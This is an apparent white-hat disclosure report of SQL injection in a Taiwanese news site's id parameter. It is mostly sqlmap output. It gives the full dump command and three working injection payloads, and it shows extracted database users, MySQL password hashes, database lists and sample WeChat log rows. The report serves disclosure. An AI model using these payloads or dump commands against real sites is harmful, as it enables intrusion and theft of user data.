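2015-11-09: Details reported to the vendor; awaiting vendor response
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public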
愛心新聞-國民教育新聞台
URL: http://**.**.**.**/detail.php?id=13597
python sqlmap.py -u "http://**.**.**.**/detail.php?id=13597" -p id --technique=BTU --random-agent -D wechat -T bl_weixin_log -C id,data --dump --threads=10 --start 1 --stop 5
1. DBA privileges, weak root password
current user: 'root@localhost'
current user is DBA: True
database management system users [4]:
[*] 'calawa'@'localhost'
[*] 'maracledb'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] calawa [1]:
    password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23
[*] maracledb [1]:
    password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD
[*] root [1]:
    password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7
2. IP information of more than 300,000 users leaked
Database: newsmydb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 149827  |
+---------------------------------------+---------+
Database: lovetv_news
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 161064  |
+---------------------------------------+---------+
3. Users' WeChat activity records leaked
Database: wechat
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bl_weixin_log                         | 108     |
+---------------------------------------+---------+
A selection is shown below:
Database: wechat
Table: bl_weixin_log
[5 entries]
+------+------+
| id   | data |
+------+------+
| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} |
| 7214 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = ' |
| 7215 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc |
| 7216 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1 |
| 7217 | Chat |
+------+------+
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
available databases [20]:
[*] bebebehappy
[*] bolaaw
[*] calawa
[*] calawa_hobby
[*] card
[*] cards
[*] comlaw
[*] fang
[*] information_schema
[*] jobs
[*] lovetv_news
[*] mydb
[*] mysql
[*] newsmydb
[*] performance_schema
[*] survey
[*] talents
[*] test
[*] wechat
[*] wine
Database: lovetv_news
Table: ipcount
[4 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | numeric     |
| ip     | non-numeric |
| page   | non-numeric |
| site   | non-numeric |
+--------+-------------+
Database: wechat
Table: bl_weixin_log
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| data   | non-numeric |
| id     | numeric     |
+--------+-------------+
Deploy a WAF.
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-11-20 15:33
Referred to related parties.
None yet